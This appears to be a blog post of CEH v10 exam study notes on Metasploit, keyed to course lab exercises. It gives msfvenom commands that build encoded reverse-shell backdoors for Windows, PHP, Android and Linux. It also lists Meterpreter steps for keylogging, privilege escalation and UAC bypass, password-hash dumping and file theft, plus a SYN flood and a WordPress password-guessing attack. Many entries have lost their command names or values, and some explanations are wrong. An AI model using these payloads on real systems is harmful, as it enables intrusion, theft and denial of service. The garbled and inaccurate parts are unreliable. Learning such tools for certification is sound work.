Metasploit Framework in CEH Exam

This post explain what is Metasploit Framework and its uses regarding Certificated Ethical Hacker (CEH) Exam. It is not intented to be an overall review of the tool.

It is focused on CEH v10.

What is Metasploit Framework?

Metasploit Framework (usually abbreviated as msf) is an open-source tool for developing and executing exploit code against a remote target machine.

The creator of Metasploit is HD Moore. You can find more info about him at his personal site or his Mastodon or Twitter accounts.

Jack Rhysider’s Darknet Diaries podcast made an interview to HD Moore, that covers the history of early Metasploit. You can listen to (or read) episode 114 “HD” on Darknet Diaries’ websiteSpotify or Apple Podcasts.

Metasploit applications

Metasploit Framework consists of a series of applications. The ones used on CEH are:

  1. msfdb: manages the Metasploit framework database
  2. msfvenom: tool to create trojans.
  3. msfconsole: tool to execute exploit.

from Linux terminal opens metasploit framework.


msfdb init

Starts Metasploit database. Before you need to have started database (for example, service postgresql start)

You may need to restart database after this (e.g. service postgresql restart). Maybe you also need to start database before this (service postgresql start).


msfvenom -l

List you all the available exploits in the database.


-p: Payload. Value example: windows/meterpreter/reverse_tcp
–platform: Platform. Value example: Windows
-a: Arch. Example: x86
-e: Encoder. Value example: x86/shikata_ga_nai
-b: Characters to ignore. Value exampe: “\x00” (including quotes)
LHOST=: value for local host. Example: LHOST=

LPORT=: value for local port. Example: LPORT=444
-f: format of output. Example: exe , or elf
>: path for output. Example: Desktop/Backdoor.exe

-o: also path for output



Used to connect to remote Windows machines.


Generates a PHP file. It must be copied to a text file and saved and PHP. Then you must try to run it on a web server


Generate an apk file for Android.


Generate file for Linux


msfvenom -p windows/meterpreter/reverse_tcp –platform windows -a x86 -e x86/shikata_ga_nai -b “\x00” LHOST= -f exe > Desktop/Backdoor.exe

msfvenom -p windows/meterpreter/reverse_tcp –platform windows -a x86 -f exe LHOST= LPORT=444 -o /root/Desktop/Test.exe

msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4444 -f raw [generates a file]

msfvenom -p android/meterpreter/reverse_tcp –platform android -a dalvik LHOST= R > Desktop/Backdoor.apk

msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT=4444 –platform linux -f elf > /root/Desktop/exploit.elf


msfconsole commands


Displays hosts on subnetwork.


Displays services on active hosts.


Checks db status. If database is not connected, maybe you need to initialize it.

If message is success (e.g., postgresql connected to msf), everything is correct.

If it is not correct, you may need to run msfdb correctly.

db_import <filename>

Imports a file in msf database to local disk.


Calls nmap command.


I do not know the difference between nmap and db_nmap. If you know the difference, please add a comment.

use <module name with path>

Enters to a msf module. Value example: scanner/smb/smb_version

show auxiliary

Lists the available auxiliary tools.

show exploits

Lists the available exploits.

show payloads

Lists the available payloads.


Sets a multi/handler session to background and goes back to msf shell.

Auxiliary modules


SMB scanner module scanner/smb/smb_version to get OS flavour.

Seen on CEHv10, mod. 2, ex. 5.

show options


set THREADS 100



Seen on CEHv10, mod. 4, ex. 9.




Seen on CEHv10, mod. 4, ex. 9.

Exploit modules


Seen on CEHv10, mod. 5, ex. 4 "Exploiting Client Side Vulnerabilities and Establishing a VNC"
set payload windows/meterpreter/reverse_tcp
Sets payload.
Set local host.

Set LPORT <port number>

For example, 4444
exploit -j -z
Exploit. -j means that it is run in background with one or more session. -z is the same, but just with one session. I ignore what it means when both are executed.
Then we must wait until a connection appears, it means, a compromised computer executes the corresponding payload executable created with msfvenom.
sessions -i 1
Selects session 1. Example: sessions -i 1
See processes.

Get remote machine username.


Displays current user.


Get system info.

getsystem -t 1

Escalate priviledges. If it does not work, you can try exploit/windows/local/bypassuac/fodhelper.


Displays current path.


Check IP.
timestomp secret.txt -v

Displays the created time, accessed time, modified time, and entry modified time]
download <filename>

Download file from remote folder to local Home folder.  Example: download bootmgr

search -f “filename.ext”

Search for a file.

Captures all keyboard input from the victim system.

View captured keyboard input.

Display idletime in seconds.

Shutdowns computer.

execute -f cmd.exe -c -H , and then, shell

Executes Windows shell in remote computer.


It is used once a connection has been established with exploit/multi/handler. It allows getsystem command to succeed.

Seen on CEHv10, mod. 5, ex. 5. “Escalating Privileges by Exploiting Client Side Vulnerabilities”

It is used to escalate privileges.
show options
Display all options related to module.
set SESSION <session number>
Select the opene session with exploit/multi/handler. Example: set SESSION 1
set payload windows/meterpreter/reverse_tcp
show options
set TARGET 0
Sets exploit target id.
Runs exploit. If it is successful, it allows to escalates privileges by running getsystem.
run post/windows/gather/smart_hashdump
Dumps Windows hash.


Performs a SYN flood on objective. Seen in module 10, lab/exercise 1.

set RHOST [IP Address of Windows 10] and press Enter

Type set RPORT 21 and press Enter

Type set SHOST [IP Address of Windows Server 2016] and press Enter [set spoofable IP address]

Type set TIMEOUT 20000 [number of seconds to wait for new data]


This module is used to perform a dictionary attack against a WordPress web.

Featured in module 14, exercise 2.

show options

Display options.

set PASS_FILE /root/Desktop/Wordlists/Passwords.txt

Set file containing the passwords to perform dictionary attack.
set RHOSTS [IP Address of Windows Server 2012]

Enter to set the target IP Address, e.g., Windows Server 2012 IP Address.
set RPORT 8080

Enter to set the target machine port, e.g., Windows Server 2012 port.
set TARGETURI http://[IP Address of Windows Server 2012]:8080/CEH/

Set the base path to the WordPress website, e.g., http://[IP Address of Windows Server 2012]:8080/CEH/.
set USERNAME admin

Set the username to try to crack.

Run exploit. You must search among all the results and look for the lines marked in green.

CEHv10 exercises where Metasploit Framework is featured

  • Mod. 2 “Information Gathering”
    • Ex. 5 “Information gathering using Metasploit”
  • Mod. 4 “Enumeration”
    • Ex. 9 “SNMP Enumeration Using snmp_enum”
  • Mod. 6 “System Hacking”
    • Ex. 4 “Exploiting Client Side Vulnerabilities and Establishing a VNC”
    • Ex. 5. “Escalating Privileges by Exploiting Client Side Vulnerabilities”
    • Ex. 6. “Hacking Windows 10 using Metasploit, and Post-Exploitation Using Meterpreter”
  • Mod. 12
    • Ex. 5 “Bypassing Windows Firewall using Metasploit”
  • Mod. 14
    • Ex. 2 “Enumerating and Hacking a Web Application Using WPScan and Metasploit”
    • Ex. 6 “Exploiting File Upload Vulnerability at Different Security Levels”
  • Mod. 17 “Hacking Mobile Platforms”
    • Ex. 1 “Creating Binary Payloads using Kali Linux to Hack Android”
  • Mod. 19
    • Ex. 3 “Bypassing ownCloud Antivirus and Hacking the Host using Kali Linux”

Leave a Reply

Your email address will not be published. Required fields are marked *